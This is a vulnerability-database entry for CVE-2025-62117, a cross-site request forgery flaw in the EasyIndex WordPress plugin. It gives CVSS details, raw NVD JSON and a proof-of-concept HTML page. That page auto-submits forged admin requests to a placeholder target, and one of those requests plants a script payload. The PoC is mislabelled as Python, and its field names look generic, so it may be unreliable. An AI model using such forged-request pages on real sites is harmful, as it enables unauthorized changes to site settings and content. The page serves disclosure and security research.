Security Vulnerability Report
中文
CVE-2025-62117 CVSS 5.4 MEDIUM

CVE-2025-62117

Published: 2025-12-31 14:15:52
Last Modified: 2026-04-23 15:34:34

Description

Cross-Site Request Forgery (CSRF) vulnerability in Jayce53 EasyIndex easyindex allows Cross Site Request Forgery.This issue affects EasyIndex: from n/a through <= 1.1.1704.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

EasyIndex <= 1.1.1704(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62117 - EasyIndex Plugin --> <!DOCTYPE html> <html> <head> <title>Index Update Request</title> </head> <body> <h1>Please wait, updating your index...</h1> <!-- Example: Modify EasyIndex settings --> <form action="http://target-site.com/wp-admin/admin-post.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="easyindex_settings"> <input type="hidden" name="easyindex_option" value="malicious_value"> <input type="hidden" name="submit" value="Save Changes"> </form> <!-- Example: Create/modify index entry --> <form action="http://target-site.com/wp-admin/admin-ajax.php" method="POST" id="csrfForm2" style="display:none;"> <input type="hidden" name="action" value="easyindex_create"> <input type="hidden" name="index_title" value="Malicious Index"> <input type="hidden" name="index_content" value="<script>alert('CSRF')</script>"> </form> <script> // Auto-submit all forms when page loads document.addEventListener('DOMContentLoaded', function() { document.getElementById('csrfForm').submit(); setTimeout(function() { document.getElementById('csrfForm2').submit(); }, 1000); }); </script> <p>If nothing happens, <a href="javascript:document.getElementById('csrfForm').submit()">click here</a>.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62117", "sourceIdentifier": "[email protected]", "published": "2025-12-31T14:15:52.383", "lastModified": "2026-04-23T15:34:34.407", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Jayce53 EasyIndex easyindex allows Cross Site Request Forgery.This issue affects EasyIndex: from n/a through <= 1.1.1704."}, {"lang": "es", "value": "Falsificación de petición en sitios cruzados (CSRF) vulnerabilidad en Jayce53 EasyIndex easyindex permite falsificación de petición en sitios cruzados. Este problema afecta a EasyIndex: desde n/a hasta 1.1.1704."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/easyindex/vulnerability/wordpress-easyindex-plugin-1-1-1704-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}